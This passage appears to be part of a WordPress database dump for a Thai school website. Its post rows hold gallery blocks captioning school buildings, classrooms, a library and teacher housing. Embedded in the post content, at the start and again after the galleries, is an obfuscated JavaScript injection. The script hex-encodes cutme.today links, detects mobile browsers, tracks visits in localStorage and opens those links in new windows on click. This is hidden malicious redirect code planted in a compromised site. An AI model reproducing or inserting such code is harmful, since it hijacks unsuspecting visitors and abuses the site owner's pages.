8\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-07 10:17:09','2024-08-07 03:17:09','',14,'http://pakhaeng.ssk.in.th/?p=608',0,'revision','',0),
(609,1,'2024-08-07 11:40:34','2024-08-07 04:40:34','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e70354-bb\",\"ids\":[620,617,618,619],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":620,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=620\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0.jpg\",\"width\":750,\"height\":422},{\"id\":617,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=617\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0.jpg\",\"width\":750,\"height\":422},{\"id\":618,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=618\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0.jpg\",\"width\":750,\"height\":422},{\"id\":619,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=619\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>อาคารพิเศษ 1 ชั้น</strong></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_7a2fca-b5\",\"ids\":[622,621],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":622,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=622\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1.jpg\",\"width\":750,\"height\":422},{\"id\":621,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=621\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>อาคารเรียน สปช. 105/29 ปรับปรุง 2 ชั้น 4 ห้องเรียน </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>(ชั้นล่างโล่ง</strong>)</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_72c110-54\",\"ids\":[610,613,612],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":610,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=610\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951.jpg\",\"width\":1024,\"height\":576},{\"id\":613,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=613\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0.jpg\",\"width\":750,\"height\":422},{\"id\":612,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=612\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>อาคารเรียน สปช. 104/26 ขนาด 3 ห้องเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e7f603-c8\",\"ids\":[625,623,624],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":625,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=625\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0.jpg\",\"width\":750,\"height\":422},{\"id\":623,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=623\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968.jpg\",\"width\":750,\"height\":422},{\"id\":624,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=624\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>อาคารห้องสมุด</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_7b340e-23\",\"ids\":[633,630,631,632],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":633,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=633\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0.jpg\",\"width\":1024,\"height\":576},{\"id\":630,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=630\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0.jpg\",\"width\":1024,\"height\":576},{\"id\":631,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=631\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0.jpg\",\"width\":1024,\"height\":576},{\"id\":632,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=632\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0.jpg\",\"width\":1024,\"height\":576}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>สปช.301/26 (บ้านพักครูเดี่ยว)</strong></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_f12de5-af\",\"ids\":[616,614,615],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":616,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=616\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0.jpg\",\"width\":750,\"height\":422},{\"id\":614,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=614\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0.jpg\",\"width\":1024,\"height\":576},{\"id\":615,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=615\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0.jpg\",\"width\":1024,\"height\":576}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>อาคารเรียนอนุบาล</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e50add-00\",\"ids\":[626,627],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":626,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=626\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0.jpg\",\"width\":750,\"height\":422},{\"id\":627,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=627\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ห้องน้ำ สปช.601/26</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_5f7dc9-b0\",\"ids\":[634,635,636],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":634,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=634\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0.jpg\",\"width\":750,\"height\":422},{\"id\":635,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=635\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0.jpg\",\"width\":750,\"height\":422},{\"id\":636,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=636\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>สปช.601/26</strong></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else 